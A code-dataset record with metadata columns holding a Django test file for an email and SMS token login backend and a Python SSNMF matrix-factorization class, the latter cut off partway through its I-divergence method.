hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
17610a04c222fb0d535f11fe978558a57947af2a
| 4,946
|
py
|
Python
|
tests/test_backend.py
|
galaxybrainco/django-stagedoor
|
f9e555e1c0ee95edee25a71947304872f1353f36
|
[
"Apache-2.0"
] | 1
|
2020-05-25T22:09:40.000Z
|
2020-05-25T22:09:40.000Z
|
tests/test_backend.py
|
galaxybrainco/django-stagedoor
|
f9e555e1c0ee95edee25a71947304872f1353f36
|
[
"Apache-2.0"
] | null | null | null |
tests/test_backend.py
|
galaxybrainco/django-stagedoor
|
f9e555e1c0ee95edee25a71947304872f1353f36
|
[
"Apache-2.0"
] | null | null | null |
from unittest.mock import MagicMock, patch
from django.contrib.auth import get_user_model
from django.test import TestCase, Client, override_settings
from stagedoor.backends import EmailTokenBackend, SMSTokenBackend, StageDoorBackendMixin
from stagedoor.models import AuthToken, Email, PhoneNumber, generate_token_string
class StageDoorBackendMixinTests(TestCase):
def test_get_user_happy_path(self):
backend = StageDoorBackendMixin()
user = get_user_model().objects.create()
user_from_backend = backend.get_user(user_id=user.id)
self.assertEqual(user, user_from_backend)
def test_get_user_no_user(self):
backend = StageDoorBackendMixin()
user_from_backend = backend.get_user(user_id=7)
self.assertEqual(None, user_from_backend)
def test_authenticate_happy_path(self):
backend = StageDoorBackendMixin()
token_string = generate_token_string(email=True)
token = AuthToken.objects.create(token=token_string)
user = backend.authenticate(None, token_string)
self.assertIsNotNone(user)
def test_authenticate_no_token(self):
backend = StageDoorBackendMixin()
token_string = generate_token_string(email=True)
user = backend.authenticate(None, token_string)
self.assertIsNone(user)
def test_single_use_token(self):
backend = StageDoorBackendMixin()
user = get_user_model().objects.create()
user_from_backend = backend.get_user(user_id=user.id)
self.assertEqual(user, user_from_backend)
self.assertEqual(0, len(AuthToken.objects.all()))
class EmailBackendTests(TestCase):
def test_happy_path(self):
email = Email.objects.create(email="hello@hellocaller.app")
token_string = generate_token_string(email=True)
token = AuthToken.objects.create(email=email, token=token_string)
backend = EmailTokenBackend()
user = backend.authenticate(None, token=token_string)
self.assertIsNotNone(user)
self.assertEqual("hello@hellocaller.app", user.email)
email.refresh_from_db()
self.assertEqual(user, email.user)
def test_no_token(self):
backend = EmailTokenBackend()
user = backend.authenticate(None, token="hello@hellocaller.app")
self.assertIsNone(user)
def test_user_already_exists(self):
email = Email.objects.create(email="hello@hellocaller.app")
token_string = generate_token_string(email=True)
token = AuthToken.objects.create(email=email, token=token_string)
backend = EmailTokenBackend()
user = backend.authenticate(None, token=token_string)
self.assertIsNotNone(user)
self.assertEqual("hello@hellocaller.app", user.email)
email.refresh_from_db()
self.assertEqual(user, email.user)
# Now try again, and make sure we get the same user
token_string = generate_token_string(email=True)
token = AuthToken.objects.create(email=email, token=token_string)
user = backend.authenticate(None, token=token_string)
email.refresh_from_db()
self.assertIsNotNone(user)
self.assertEqual("hello@hellocaller.app", user.email)
self.assertEqual(user, email.user)
class SMSBackendTests(TestCase):
def test_happy_path(self):
phone_number = PhoneNumber.objects.create(phone_number="+14158675309")
token_string = generate_token_string(sms=True)
token = AuthToken.objects.create(phone_number=phone_number, token=token_string)
backend = SMSTokenBackend()
user = backend.authenticate(None, token=token_string)
self.assertIsNotNone(user)
phone_number = PhoneNumber.objects.get(phone_number="+14158675309")
self.assertEqual(user, phone_number.user)
def test_no_token(self):
backend = SMSTokenBackend()
user = backend.authenticate(None, token="+14158675310")
self.assertIsNone(user)
def test_user_already_exists(self):
phone_number = PhoneNumber.objects.create(phone_number="+14158675309")
token_string = generate_token_string(sms=True)
token = AuthToken.objects.create(phone_number=phone_number, token=token_string)
backend = SMSTokenBackend()
user = backend.authenticate(None, token=token_string)
self.assertIsNotNone(user)
phone_number = PhoneNumber.objects.get(phone_number="+14158675309")
self.assertEqual(user, phone_number.user)
# Now try again, and make sure we get the same user
token_string = generate_token_string(sms=True)
token = AuthToken.objects.create(phone_number=phone_number, token=token_string)
user = backend.authenticate(None, token=token_string)
self.assertIsNotNone(user)
phone_number = PhoneNumber.objects.get(phone_number="+14158675309")
self.assertEqual(user, phone_number.user)
| 38.341085
| 88
| 0.712495
| 565
| 4,946
| 6.021239
| 0.132743
| 0.103469
| 0.061141
| 0.079365
| 0.837155
| 0.797472
| 0.783363
| 0.725162
| 0.700764
| 0.674897
| 0
| 0.017077
| 0.194905
| 4,946
| 128
| 89
| 38.640625
| 0.837268
| 0.020016
| 0
| 0.795699
| 0
| 0
| 0.040875
| 0.026012
| 0
| 0
| 0
| 0
| 0.247312
| 1
| 0.11828
| false
| 0
| 0.053763
| 0
| 0.204301
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1764688007b339099e066fde3467d3e902da9720
| 27,979
|
py
|
Python
|
src/ssnmf/ssnmf.py
|
lara-kassab/ssnmf
|
5e27d6d8daf02c08e82017fe137305823d3a8129
|
[
"MIT"
] | null | null | null |
src/ssnmf/ssnmf.py
|
lara-kassab/ssnmf
|
5e27d6d8daf02c08e82017fe137305823d3a8129
|
[
"MIT"
] | null | null | null |
src/ssnmf/ssnmf.py
|
lara-kassab/ssnmf
|
5e27d6d8daf02c08e82017fe137305823d3a8129
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Class and functions for training (SS)NMF model.
The NMF model consists of the data matrix to be factorized, X, the factor matrices, A and
S. Each model also consists of a label matrix, Y, classification factor matrix, B, and
classification weight parameter, lam (although these three variables will be empty if Y is not
input). These parameters define the objective function defining the model:
(1) ||X - AS||_F^2 (train with mult) or
(2) ||X - AS||_F^2 + lam * ||Y - BS||_F^2 (train with snmfmult) or
(3) ||X - AS||_F^2 + lam * D(Y||BS) (train with klsnmfmult).
Examples
--------
unsupervised (1), saving errors, declaring number of iterations
>>> numIters = 100
>>> model = SSNMF(numpy.random.rand(100,100),10)
>>> errs = model.mult(saveerrs = True,numiters = numIters)
unsupervised (1) with missing data, not saving errors, declaring number of iterations
>>> numIters = 100
>>> model = SSNMF(numpy.random.rand(100,100),10, W = data['obsdata'])
>>> model.mult(numiters = numIters)
supervised (2), saving errors, default number of iterations
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'])
>>> errs = model.snmfmult(saveerrs = True)
semi-supervised (2), saving errors, default number of iterations
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'], L = data['obslabels'])
>>> errs = model.snmfmult(saveerrs = True)
supervised (3), not saving errors, declaring number of iterations
>>> numIters = 15
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'])
>>> model.klsnmfmult(numiters = numIters)
semi-supervised (3), not saving errors, declaring number of iterations and regularization parameter lam
>>> numIters = 15
>>> model = SSNMF(data['datamat'], 10, lam = 0.1, Y = data['labelmat'], L = data['obslabels'])
>>> model.klsnmfmult(numiters = numIters)
semi-supervised (3) with missing data, not saving errors, declaring number of iterations
>>> numIters = 15
>>> model = SSNMF(data['datamat'], 10, Y = data['labelmat'], W = data['obsdata'], L = data['obslabels'])
>>> model.klsnmfmult(numiters = numIters)
'''
import numpy as np
from numpy import linalg as la
class SSNMF:
"""
Class for (SS)NMF model.
The NMF model consists of the data matrix to be factorized, X, the factor matrices, A and
S. Each model also consists of a label matrix, Y, classification factor matrix, B, and
classification weight parameter, lam (although these three variables will be empty if Y is not
input). These parameters define the objective function defining the model:
(1) ||X - AS||_F^2 (train with mult) or
(2) ||X - AS||_F^2 + lam * ||Y - BS||_F^2 (train with snmfmult) or
(3) ||X - AS||_F^2 + lam * D(Y||BS) (train with klsnmfmult).
...
Parameters
----------
X : array
Data matrix of size m x n.
k : int_
Number of topics.
Y : array, optional
Label matrix of size p x n (default is None).
W : array, optional
Binary matrix of size p x n, whether the data is observed or not (default is None).
L : array, optional
Binary matrix of size m x n, whether the label is known or not (default is None).
lam : float_, optional
Weight parameter for classification term in objective (the default is 1 if Y is not
None, None otherwise).
A : array, optional
Initialization for left factor matrix of X of size m x k (the default is a matrix with
uniform random entries).
S : array, optional
Initialization for right factor matrix of X of size k x n (the default is a matrix with
uniform random entries).
B : array, optional
Initialization for left factor matrix of Y of size p x k (the default is a matrix with
uniform random entries if Y is not None, None otherwise).
Methods
-------
mult(numiters = 10, saveerrs = True)
Train the unsupervised model (1) via numiters multiplicative updates.
snmfmult(numiters = 10, saveerrs = True)
Train the (semi-)supervised model (2) via numiters multiplicative updates.
klsnmfmult(numiters = 10, saveerrs = True)
Train the (semi-)supervised model (3) via numiters multiplicative updates.
accuracy()
Compute the classification accuracy of semi-supervised model (using Y, B, and S).
kldiv()
Compute the I-divergence, D(Y||BS), of semi-upervised model (using Y, B, and S).
"""
def __init__(self, X, k, **kwargs):
self.X = X
rows = np.shape(X)[0]
cols = np.shape(X)[1]
self.A = kwargs.get('A',np.random.rand(rows,k)) #initialize factor A
self.S = kwargs.get('S',np.random.rand(k,cols)) #initialize factor S
#check dimensions of X, A, and S match
if rows != np.shape(self.A)[0]:
raise Exception('The row dimensions of X and A are not equal.')
if cols != np.shape(self.S)[1]:
raise Exception('The column dimensions of X and S are not equal.')
if np.shape(self.A)[1] != k:
raise Exception('The column dimension of A is not equal to the input number of topics.')
if np.shape(self.S)[0] != k:
raise Exception('The row dimension of S is not equal to the input number of topics.')
#supervision initializations (optional)
self.Y = kwargs.get('Y',None)
if self.Y is not None:
#check dimensions of X and Y match
if np.shape(self.Y)[1] != np.shape(self.X)[1]:
raise Exception('The column dimensions of X and Y are not equal.')
classes = np.shape(self.Y)[0]
self.B = kwargs.get('B',np.random.rand(classes,k))
self.lam = kwargs.get('lam',1)
#check dimensions of Y, S, and B match
if np.shape(self.B)[0] != classes:
raise Exception('The row dimensions of Y and B are not equal.')
if np.shape(self.B)[1] != k:
raise Exception('The column dimension of B is not equal to the input number of topics.')
else:
self.B = None
self.lam = None
# missing data (optional)
self.W = kwargs.get('W',None)
if self.W is not None:
#check dimensions of X and W match
if np.shape(self.W)[0] != np.shape(self.X)[0]:
raise Exception('The row dimensions of X and W are not equal.')
if np.shape(self.W)[1] != np.shape(self.X)[1]:
raise Exception('The column dimensions of X and W are not equal.')
# missing labels, semi-supervision (optional)
self.L = kwargs.get('L',None)
if self.L is not None:
#check dimensions of Y and L match
if np.shape(self.L)[0] != np.shape(self.Y)[0]:
raise Exception('The row dimensions of Y and L are not equal.')
if np.shape(self.L)[1] != np.shape(self.Y)[1]:
raise Exception('The column dimensions of Y and L are not equal.')
def mult(self,**kwargs):
'''
Multiplicative updates for training unsupervised NMF model (1).
Parameters
----------
numiters : int_, optional
Number of iterations of updates to run (default is 10).
saveerrs : bool, optional
Boolean indicating whether to save model errors during iterations.
eps : float_, optional
Epsilon value to prevent division by zero (default is 1e-10).
Returns
-------
errs : array, optional
If saveerrs, returns array of ||X - AS||_F for each iteration (length numiters).
'''
numiters = kwargs.get('numiters', 1000)
saveerrs = kwargs.get('saveerrs', False)
eps = kwargs.get('eps', 1e-10)
if saveerrs:
errs = np.empty(numiters) #initialize error array
if self.W is None:
for i in range(numiters):
#multiplicative updates for A and S
self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
self.X @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S,eps+ np.transpose(self.A) @ self.A @ self.S), \
np.transpose(self.A) @ self.X)
if saveerrs:
errs[i] = la.norm(self.X - self.A @ self.S, 'fro') #save reconstruction error
print("Completed NMF for unsupervised learning without missing data.")
if saveerrs:
return [errs]
elif self.W is not None:
for i in range(numiters):
#multiplicative updates for A and S
self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
np.multiply(self.W,self.X) @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S,eps+ np.transpose(self.A) @ np.multiply(self.W,self.A @ self.S)), \
np.transpose(self.A) @ np.multiply(self.W,self.X))
if saveerrs:
errs[i] = la.norm(np.multiply(self.W,self.X) - np.multiply(self.W, self.A @ self.S), 'fro') #save reconstruction error
print("Completed NMF for unsupervised learning with missing data.")
if saveerrs:
return [errs]
def snmfmult(self,**kwargs):
'''
Multiplicative updates for training semi-supervised NMF model (2).
Parameters
----------
numiters : int_, optional
Number of iterations of updates to run (default is 10).
saveerrs : bool, optional
Boolean indicating whether to save model errors during iterations.
eps : float_, optional
Epsilon value to prevent division by zero (default is 1e-10).
Returns
-------
errs : array, optional
If saveerrs, returns array of ||X - AS||_F^2 + lam ||Y - BS||_F^2 for each
iteration (length numiters).
reconerrs : array, optional
If saveerrs, returns array of ||X - AS||_F for each iteration (length numiters).
classerrs : array, optional
If saveerrs, returns array of ||Y - BS||_F for each iteration (length numiters).
classaccs : array, optional
If saveerrs, returns array of classification accuracy (computed with Y, B, S) at each
iteration (length numiters).
'''
numiters = kwargs.get('numiters', 1000)
saveerrs = kwargs.get('saveerrs', False)
eps = kwargs.get('eps', 1e-10)
if saveerrs:
errs = np.empty(numiters) #initialize error array
reconerrs = np.empty(numiters)
classerrs = np.empty(numiters)
classaccs = np.empty(numiters)
if self.Y is None:
#if no label matrix provided, train unsupervised model instead
raise Exception('Label matrix Y not provided: train with mult instead.')
if self.L is None and self.W is None:
# supervised learning, without missing data
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
self.X @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B, eps+ self.B @ self.S @ np.transpose(self.S)), \
self.Y @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ self.A @ self.S + \
self.lam * np.transpose(self.B) @ self.B @ self.S), \
np.transpose(self.A) @ self.X + self.lam * np.transpose(self.B) \
@ self.Y)
if saveerrs:
reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
classerrs[i] = la.norm(self.Y - self.B @ self.S, 'fro')
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
classaccs[i] = self.accuracy()
print("Completed SSNMF for supervised learning without missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
elif self.L is not None and self.W is None:
# semi-supervised learning, without missing data
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
self.X @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B, eps+ np.multiply(self.L,self.B @ self.S) @ np.transpose(self.S)), \
np.multiply(self.L,self.Y) @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ self.A @ self.S + \
self.lam * np.transpose(self.B) @ np.multiply(self.L,self.B @ self.S)), \
np.transpose(self.A) @ self.X + self.lam * np.transpose(self.B) \
@ np.multiply(self.L,self.Y))
if saveerrs:
reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
classerrs[i] = la.norm(np.multiply(self.L,self.Y) - np.multiply(self.L,self.B @ self.S), 'fro')
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
classaccs[i] = self.accuracy()
print("Completed SSNMF for semi-supervised learning without missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
elif self.L is None and self.W is not None:
# supervised learning, with missing data
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
np.multiply(self.W,self.X) @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B, eps+ self.B @ self.S @ np.transpose(self.S)), \
self.Y @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
self.lam * np.transpose(self.B) @ self.B @ self.S), \
np.transpose(self.A) @ np.multiply(self.W, self.X) + self.lam * np.transpose(self.B) \
@ self.Y)
if saveerrs:
reconerrs[i] = la.norm(np.multiply(self.W, self.X) - np.multiply(self.W, self.A @ self.S), 'fro')
classerrs[i] = la.norm(self.Y - self.B @ self.S, 'fro')
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
classaccs[i] = self.accuracy()
print("Completed SSNMF for supervised learning with missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
elif self.W is not None and self.L is not None:
# semisupervised learning, with missing data
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
np.multiply(self.W,self.X) @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B, eps+ np.multiply(self.L, self.B @ self.S) @ np.transpose(self.S)), \
np.multiply(self.L, self.Y) @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
self.lam * np.transpose(self.B) @ np.multiply(self.L,self.B @ self.S)), \
np.transpose(self.A) @ np.multiply(self.W, self.X) + self.lam * np.transpose(self.B) \
@np.multiply(self.L, self.Y))
if saveerrs:
reconerrs[i] = la.norm(np.multiply(self.W, self.X) - np.multiply(self.W, self.A @ self.S), 'fro')
classerrs[i] = la.norm(np.multiply(self.L, self.Y) - np.multiply(self.L, self.B @ self.S), 'fro')
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i]**2 #save errors
classaccs[i] = self.accuracy()
print("Completed SSNMF for semi-supervised learning with missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
def klsnmfmult(self,**kwargs):
'''
Multiplicative updates for training semi-supervised NMF model (3).
Parameters
----------
numiters : int_, optional
Number of iterations of updates to run (default is 10).
saveerrs : bool, optional
Boolean indicating whether to save model errors during iterations.
eps : float_, optional
Epsilon value to prevent division by zero (default is 1e-10).
Returns
-------
errs : array, optional
If saveerrs, returns array of ||X - AS||_F^2 + lam D(Y||BS) for each
iteration (length numiters).
reconerrs : array, optional
If saveerrs, returns array of ||X - AS||_F for each iteration (length numiters).
classerrs : array, optional
If saveerrs, returns array of D(Y||BS) for each iteration (length numiters).
classaccs : array, optional
If saveerrs, returns array of classification accuracy (computed with Y, B, S) at each
iteration (length numiters).
'''
numiters = kwargs.get('numiters', 1000)
saveerrs = kwargs.get('saveerrs', False)
eps = kwargs.get('eps', 1e-10)
if saveerrs:
errs = np.empty(numiters) #initialize error array
reconerrs = np.empty(numiters)
classerrs = np.empty(numiters)
classaccs = np.empty(numiters)
if self.Y is None:
#if no label matrix provided, train unsupervised model instead
raise Exception('Label matrix Y not provided: train with mult instead.')
classes = np.shape(self.Y)[0]
cols = np.shape(self.Y)[1]
if self.L is None and self.W is None:
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
self.X @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B,eps+ np.ones((classes,cols)) @ np.transpose(self.S)), \
np.divide(self.Y, eps+ self.B @ self.S) @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ self.A @ self.S + \
self.lam * np.transpose(self.B) @ \
np.ones((classes,cols)))),2 * np.transpose(self.A) \
@ self.X + self.lam * np.transpose(self.B) @ \
np.divide(self.Y, eps+ self.B @ self.S))
if saveerrs:
reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
classerrs[i] = self.kldiv()
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
classaccs[i] = self.accuracy()
print("Completed I-SSNMF for supervised learning without missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
if self.L is None and self.W is not None:
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W, self.A @ self.S) @ np.transpose(self.S)), \
np.multiply(self.W, self.X) @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B,eps+ np.ones((classes,cols)) @ np.transpose(self.S)), \
np.divide(self.Y, eps+ self.B @ self.S) @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
self.lam * np.transpose(self.B) @ \
np.ones((classes,cols)))),2 * np.transpose(self.A) \
@ np.multiply(self.W, self.X) + self.lam * np.transpose(self.B) @ \
np.divide(self.Y, eps+ self.B @ self.S))
if saveerrs:
reconerrs[i] = la.norm(np.multiply(self.W,self.X) - np.multiply(self.W,self.A @ self.S), 'fro')
classerrs[i] = self.kldiv()
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
classaccs[i] = self.accuracy()
print("Completed I-SSNMF for supervised learning with missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
if self.L is not None and self.W is None:
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ self.A @ self.S @ np.transpose(self.S)), \
self.X @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B,eps+ self.L @ np.transpose(self.S)), \
np.divide(np.multiply(self.L, self.Y), eps+ np.multiply(self.L,self.B @ self.S)) @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ self.A @ self.S + \
self.lam * np.transpose(self.B) @ \
self.L)),2 * np.transpose(self.A) \
@ self.X + self.lam * np.transpose(self.B) @ \
np.divide(np.multiply(self.L,self.Y), eps+ np.multiply(self.L,self.B @ self.S)))
if saveerrs:
reconerrs[i] = la.norm(self.X - self.A @ self.S, 'fro')
classerrs[i] = self.kldiv()
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
classaccs[i] = self.accuracy()
print("Completed I-SSNMF for semi-supervised learning without missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
if self.L is not None and self.W is not None:
for i in range(numiters):
#multiplicative updates for A, S, and B
self.A = np.multiply(np.divide(self.A,eps+ np.multiply(self.W,self.A @ self.S) @ np.transpose(self.S)), \
np.multiply(self.W,self.X) @ np.transpose(self.S))
self.B = np.multiply(np.divide(self.B,eps+ self.L @ np.transpose(self.S)), \
np.divide(np.multiply(self.L, self.Y), eps+ np.multiply(self.L,self.B @ self.S)) @ np.transpose(self.S))
self.S = np.multiply(np.divide(self.S, eps+ (2 * np.transpose(self.A) @ np.multiply(self.W, self.A @ self.S) + \
self.lam * np.transpose(self.B) @ \
self.L)),2 * np.transpose(self.A) \
@ np.multiply(self.W,self.X) + self.lam * np.transpose(self.B) @ \
np.divide(np.multiply(self.L,self.Y), eps+ np.multiply(self.L,self.B @ self.S)))
if saveerrs:
reconerrs[i] = la.norm(np.multiply(self.W,self.X) - np.multiply(self.W,self.A @ self.S), 'fro')
classerrs[i] = self.kldiv()
errs[i] = reconerrs[i]**2 + self.lam * classerrs[i] #save errors
classaccs[i] = self.accuracy()
print("Completed I-SSNMF for semi-supervised learning with missing data.")
if saveerrs:
return [errs,reconerrs,classerrs,classaccs]
def accuracy(self,**kwargs):
'''
Compute accuracy of semi-supervised model (2) or (3) above.
Returns
-------
acc : float_
Fraction of correctly classified data points (computed with Y, B, S).
'''
if self.Y is None:
raise Exception('Label matrix Y not provided: model is not semi-supervised.')
if self.L is None:
#count number of data points which are correctly classified
numdata = np.shape(self.Y)[1]
numacc = 0
Yhat = self.B @ self.S
for i in range(numdata):
true_max = np.argmax(self.Y[:,i])
approx_max = np.argmax(Yhat[:,i])
if true_max == approx_max:
numacc = numacc + 1
#return fraction of correctly classified data points
acc = numacc/numdata
return acc
if self.L is not None:
#count number of data points which are correctly classified
numdata = np.shape(self.Y)[1]
num_labels = numdata
numacc = 0
Yhat = np.multiply(self.L, self.B @ self.S)
for i in range(numdata):
true_max = np.argmax(np.multiply(self.L,self.Y)[:,i])
approx_max = np.argmax(Yhat[:,i])
if (true_max == approx_max and np.multiply(self.L,self.Y)[true_max,i] != 0):
numacc = numacc + 1
if (true_max == approx_max and np.multiply(self.L,self.Y)[true_max,i] == 0):
num_labels = num_labels - 1
#return fraction of correctly classified data points
acc = numacc/num_labels
return acc
def kldiv(self,**kwargs):
'''
Compute I-divergence between Y and BS of semi-supervised model (most naturally (3)).
Parameters
----------
eps : float_, optional
Epsilon value to prevent division by zero (default is 1e-10).
Returns
-------
kldiv : float_
I-divergence between Y and BS.
'''
eps = kwargs.get('eps', 1e-10)
if self.Y is None:
raise Exception('Label matrix Y not provided: model is not semi-supervised.')
if self.L is None:
#compute divergence
Yhat = self.B @ self.S
